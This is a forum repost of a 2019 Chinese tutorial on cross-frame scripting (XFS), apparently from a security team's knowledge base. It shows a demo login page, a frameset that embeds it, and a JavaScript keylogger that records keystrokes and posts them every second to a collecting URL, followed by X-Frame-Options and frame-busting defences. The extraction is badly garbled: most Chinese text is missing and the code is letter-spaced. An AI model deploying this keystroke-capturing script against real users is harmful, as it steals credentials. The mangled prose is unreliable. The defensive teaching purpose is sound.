搜索

[312] 2019-09-18_XFS框架脚本漏洞介绍

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-16
2019-09-18_XFS框架脚本漏洞介绍 X F S   a F a   2 0 1 9 - 0 9 - 1 8     X F S C r o s s - F r a m e S c r i p t i n g i F r a m e X F S h t m l < ! D O C T Y P E   h t m l > < h t m l > < h e a d > < m e t a   c h a r s e t = " u t f - 8 " > < t i t l e > < / t i t l e > < s c r i p t > f u n c t i o n   c h e c k ( ) {         i f   ( w i n d o w . t o p ! = w i n d o w . s e l f )   {                 a l e r t ( ! " ) ;         }         e l s e {                 a l e r t   ( " !   " ) ;         } } < / s c r i p t > < / h e a d > < f o r m >     < h 1 > T e s t < / h 1 >     < b r / > < h r / > < b r / >     u s e r n a m e < i n p u t   t y p e = " t e x t "   n a m e = " u s e r n a m e " > < b r / > < b r / >     p a s s w o r d < i n p u t   t y p e = " p a s s w o r d "   n a m e = " p a s s w o r d " > < b r / > < b r / >     < i n p u t   t y p e = " s u b m i t "   n a m e = " s u b m i t " > & n b s p ; & n b s p ; & n b s p ; & n b s p ; & n b s p ; & n b s p ;
c h e c k c h e c k   h t m l f r a m e t o p s e l f   f r a m e h t m l f r a m e 1 . h t m l 2 . h t m l 1 . h t m l     < i n p u t   t y p e = " s u b m i t "   n a m e = " s u b m i t " > & n b s p ; & n b s p ; & n b s p ; & n b s p ; & n b s p ; & n b s p ;     < i n p u t   t y p e = " b u t t o n "   o n c l i c k = " c h e c k ( ) "   v a l u e = " " > < / f o r m > < / h t m l > < ! D O C T Y P E   h t m l > < h t m l > < h e a d > < m e t a   c h a r s e t = " u t f - 8 " > < t i t l e > < / t i t l e > < / h e a d > < f r a m e s e t   o n l o a d = " t h i s . f o c u s ( ) ; "   o n b l u r = " t h i s . f o c u s ( ) ; "   c o l s = " 1 0 0 % " >     < f r a m e   s r c = " h t t p : / / l o c a l h o s t / 1 . h t m l "   s c r o l l i n g = " a u t o " > < / f r a m e s e t > < / h t m l >
    U R L 使 2 . h t m l J S J S     < s c r i p t >     v a r   k e y s t r o k e s   =   [ ] ;     / /     d o c u m e n t . o n k e y p r e s s   =   f u n c t i o n ( ) {         k e y s t r o k e s . p u s h ( w i n d o w . e v e n t . k e y C o d e ) ;     }     / /     s e t I n t e r v a l ( f u n c t i o n ( ) {         i f ( k e y s t r o k e s . l e n g t h ) {             v a r   x h r   =   n e w X H R ( ) ;             x h r . o p e n ( " P O S T " , " h t t p : / / l o c a l h o s t / 1 . p h p " ) ;             x h r . s e n d ( k e y s t r o k e s . j o i n ( " + " ) ) ;         }         k e y s t r o k e s   =   [ ] ;     } , 1 0 0 0 ) ;     / / a j a x     f u n c t i o n   n e w X H R ( ) {         i f ( w i n d o w s . X M L H t t p R e q u e s t ) {             r e t u r n   n e w   X M L H t t p R e q u e s t ( ) ;         }         r e t u r n   n e w   A c t i v e X O b j e c t ( " M S X M L 2 . X M L H T T P . 3 . 0 " ) ;     } < / s c r i p t >
J S 1 . h t m l 访 2 . h t m l 1 . h t m l   X - F r a m e - O p t i o n s < f r a m e > < i f r a m e > < e m b e d > < o b j e c t > X - F r a m e - O p t i o n s 1 D E N Y 2 S A M E O R I G I N 3 A L L O W - F R O M   U R I A p a c h e L o a d M o d u l e   h e a d e r s _ m o d u l e m o d u l e s / m o d _ h e a d e r s . s o H e a d e r   a l w a y s a p p e n d   X - F r a m e - O p t i o n s   D E N Y 访 2 . h t m l X F S   g e t i f ( t o p   ! =   s e l f ) {         t o p . l o c a t i o n   =   s e l f . l o c a t i o n ; } X - F r a m e - O p t i o n s :   d e n y X - F r a m e - O p t i o n s :   s a m e o r i g i n X - F r a m e - O p t i o n s :   a l l o w - f r o m   h t t p s : / / e x a m p l e . c o m /

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理